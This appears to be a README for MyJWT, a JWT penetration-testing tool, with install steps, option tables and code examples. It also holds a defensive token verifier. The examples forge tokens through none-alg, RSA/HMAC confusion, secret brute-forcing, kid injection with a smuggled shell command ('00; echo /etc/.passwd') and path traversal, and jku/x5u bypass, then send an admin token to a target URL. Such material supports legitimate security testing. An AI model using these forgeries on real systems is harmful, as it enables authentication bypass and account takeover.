MyJWT: a JSON Web Token (JWT) penetration testing tool

JWT: JSON Web Token

MyJWT features

  • Copy the new JWT to the clipboard
  • User interface
  • Colored output
  • Modify the JWT (header / payload)
  • None-algorithm vulnerability
  • RSA / HMAC confusion
  • Sign the JWT with a key
  • Brute-force the key
  • Crack the JWT with a regular expression to guess the key
  • kid injection
  • jku bypass
  • x5u bypass

Installation

To install myjwt, simply use pip:

pip install myjwt

To run myjwt from the Docker image, run:

docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# on Windows
docker run -v %CD%/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

To install myjwt from git:

git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/myjwt_cli.py --help

To install myjwt on BlackArch:

pacman -S myjwt

Possible installation problems

Windows

cryptography package

set INCLUDE=C:\OpenSSL-Win32\include;%INCLUDE%
set LIB=C:\OpenSSL-Win32\lib;%LIB%
pip install cryptography

More information here

PyOpenSSL package

More information here

Installing Make

Run PowerShell as administrator and enter:

choco install make

Using myjwt

$ myjwt --help
用法: myjwt [参数] JWT


选项:
  --version                    显示版本并退出.
  --full-payload TEXT          jwt的新有效负载。Json格式要求。
  -h, --add-header TEXT        添加一个新的key, value到您的jwt头,如果key存在,
                               旧的 value将被替换。格式:key=value 

  -p, --add-payload TEXT      添加一个新的key到您的jwtpayload,如果key存在,
                              旧的 value将被替换,格式: key=value.

  --sign TEXT                  用给定的密钥签名您的jwt。
  --verify TEXT                验证你的key.
  -none, --none-vulnerability  检查无Alg漏洞。
  --hmac PATH                  检查RS/HMAC Alg漏洞.
  --bruteforce PATH            暴力破解用来签名的秘密token.

  -c, --crack TEXT             regex to iterate all string possibilities to
                               guess the secret used to sign the token.

  --kid TEXT                   Kid Injection sql
  --jku TEXT                   Jku Header to bypass authentication
  --x5u TEXT                   X5u Header to bypass authentication
  --crt TEXT                   For x5cHeader, force crt file
  --key TEXT                   For jku or x5c Header, force private key to
                               your key file

  --file TEXT                  For jku Header and x5u Header, force file name
  --print                      Print Decoded JWT
  -u, --url TEXT               Url to send your jwt.
  -m, --method TEXT            发送请求到url的方法。(默认:get)

  -d, --data TEXT              data发送到您的url.格式: key=value.
                               如果 value = MY_JWT 值将被新的jwt替换

  -c, --cookies TEXT           Cookies发送到您的url.格式: key=value.
                               如果 value = MY_JWT 值将被新的jwt替换

  --help                       显示此消息并退出.

Modifying the JWT

Option | Type | Example | Description
--full-payload | JSON | {"user": "admin"} | New payload for the JWT.
-h, --add-header | key=value | user=admin | Add a new key/value to your JWT header; if the key exists, the old value is replaced.
-p, --add-payload | key=value | user=admin | Add a new key/value to your JWT payload; if the key exists, the old value is replaced.

Checking your JWT (HS alg)

Option | Type | Example | Description
--sign | text | mysecretkey | Sign the JWT with the key.
--verify | text | mysecretkey | Verify your key.

Exploit

Option | Type | Example | Description
-none, --none-vulnerability | Nothing | | Check the none-alg vulnerability.
--hmac | PATH | ./public.pem | Check the RS/HMAC alg vulnerability and sign your JWT with the public key.
--bruteforce | PATH | ./wordlist/big.txt | Brute-force to guess the secret used to sign the token. Use a txt file with all passwords stored (one per line).
--crack | REGEX | "[a-z]{4}" | Regex to iterate over all string possibilities to guess the secret used to sign the token.
--kid | text | "00; echo /etc/.passwd" | kid injection (SQL)
--jku | text | MYPUBLICIP | jku header to bypass authentication; use --file to change your JWKS file name and --key to use your own private PEM.
--x5u | text | MYPUBLICIP | x5u header to bypass authentication; use --file to change your JWKS file name and --key to use your own private PEM.

Sending your JWT

Option | Type | Example | Description
-u, --url | url | http://challenge01.root-me.org/web-serveur/ch59/admin | URL to send your JWT to.
-m, --method | text | POST | Method used to send the request to the URL (default: GET).
-d, --data | key=value | secret=MY_JWT | Data to send to your URL. Format: key=value. If value = MY_JWT, the value is replaced by your new JWT.
-c, --cookies | key=value | secret=MY_JWT | Cookies to send to your URL. Format: key=value. If value = MY_JWT, the value is replaced by your new JWT.

Other

Option | Type | Example | Description
--crt | PATH | ./public.crt | For the x5c header, force the crt file.
--key | PATH | ./private.pem | For the jku or x5c header, force the private key to your key file.
--file | text | myfile | For the jku header, force the file name (without the .json extension).
--print | Nothing | | Print the decoded JWT.
--help | Nothing | | Show the help message and exit.
--version | Nothing | | Show the MyJWT version.

Modify your JWT

Command line

myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

Code

from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

jwt = "YOUR_JWT"  # placeholder: the encoded token to modify
jwt_json = jwt_to_json(jwt)  # decode the header and payload
jwt_json = add_header(jwt_json, {"kid": "001"})  # add or replace a header key
jwt_json = change_payload(jwt_json, {"username": "admin"})  # add or replace a payload key
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]  # re-encode, keeping the original signature

Full example here: 01-modify-jwt

None-algorithm vulnerability

Command line

myjwt YOUR_JWT --none-vulnerability

Code

from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability

jwt = "YOUR_JWT"  # placeholder: the encoded token to test
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

Full example here: 02-none-vulnerability

Sign with a key

Command line

myjwt YOUR_JWT --sign YOUR_KEY

Code

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json

jwt = "YOUR_JWT"  # placeholder: the encoded token to re-sign
key = "test"
jwt = signature(jwt_to_json(jwt), key)  # re-sign the token with the given HMAC key

Full example here: 03-sign-key

Brute force

Command line

myjwt YOUR_JWT --bruteforce PATH

Code

from myjwt.vulnerabilities import bruteforce_wordlist

jwt = "YOUR_JWT"  # placeholder: the encoded token to test
wordlist = "../../wordlist/common_pass.txt"  # one candidate secret per line
key = bruteforce_wordlist(jwt, wordlist)  # try each candidate against the signature

Full example here: 04-brute-force

Crack

Command line

myjwt YOUR_JWT --crack REGEX

RSA / HMAC confusion

Command line

myjwt YOUR_JWT --hmac FILE

Code

from myjwt.vulnerabilities import confusion_rsa_hmac

jwt = "YOUR_JWT"  # placeholder: the encoded token to test
file = "public.pem"  # the server's RSA public key
jwt = confusion_rsa_hmac(jwt, file)

Full example here: 05-rsa-hmac-confusion

kid injection

Command line

myjwt YOUR_JWT --kid INJECTION

Code

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

jwt = "YOUR_JWT"  # placeholder: the encoded token to test
injection = "../../../../../../dev/null"  # value written into the kid header
sign = ""  # key used for the new signature (empty in this example)
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)

Full example here: 06-kid-injection

Send your new JWT to a URL

Command line

myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --none-vulnerability --add-payload "username=admin"

jku vulnerability

Command line

myjwt YOUR_JWT --jku YOUR_URL

Code

from myjwt.vulnerabilities import jku_vulnerability

jwt = "YOUR_JWT"  # placeholder: the encoded token to test
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(new_jwt)

Full example here: 07-jku-bypass

x5u vulnerability

Command line

myjwt YOUR_JWT --x5u YOUR_URL

Code

from myjwt.vulnerabilities import x5u_vulnerability

jwt = "YOUR_JWT"  # placeholder: the encoded token to test
new_jwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(new_jwt)

Full example here: 08-x5u-bypass
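As a defender-side counterpart to the none-alg, RSA/HMAC confusion, kid injection, jku and x5u checks above, here is an added example (not MyJWT's code) of a verifier that pins the algorithm per key, resolves kid only against an in-memory store, and refuses remote-key headers outright. KEYS, its kid values and the secret are constructed assumptions, and only HS256 keys are handled.

```python
import base64, hashlib, hmac, json

# Constructed key store (hypothetical): kid -> (pinned algorithm, secret).
# kid is only ever a dictionary key here, never a file path or SQL fragment.
KEYS = {"k1": ("HS256", b"correct-horse-battery-staple")}

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build an HS256 token; used here only to construct sample input."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"

def verify(token: str) -> tuple:
    """Return (True, payload) if the token verifies, else (False, reason)."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        payload = json.loads(b64url_decode(p))
        sig = b64url_decode(s)
    except ValueError:  # bad split, bad base64 or bad JSON
        return False, "malformed token"
    if not isinstance(header, dict):
        return False, "malformed token"
    # jku/x5u/x5c let the sender choose the verification key: refuse them.
    for name in ("jku", "x5u", "x5c"):
        if name in header:
            return False, f"{name} header not accepted"
    kid = header.get("kid")
    if not isinstance(kid, str) or kid not in KEYS:
        return False, "unknown kid"
    expected_alg, secret = KEYS[kid]
    # alg is pinned per key, so 'none' and RS->HS confusion are both rejected.
    # (Only HMAC keys are stored here; an RSA entry would dispatch to an RSA verifier.)
    if header.get("alg") != expected_alg:
        return False, "unexpected alg"
    mac = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, sig):
        return False, "bad signature"
    return True, payload

# Constructed sample token (not from the page), signed with the k1 secret.
GOOD = sign_hs256({"alg": "HS256", "kid": "k1"}, {"username": "user"}, KEYS["k1"][1])
```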

Downloads

GitHub: github.com/mBouamama/MyJWT/releases
雨苁网盘 (mirror): w.ddosi.workers.dev/github/myjwt/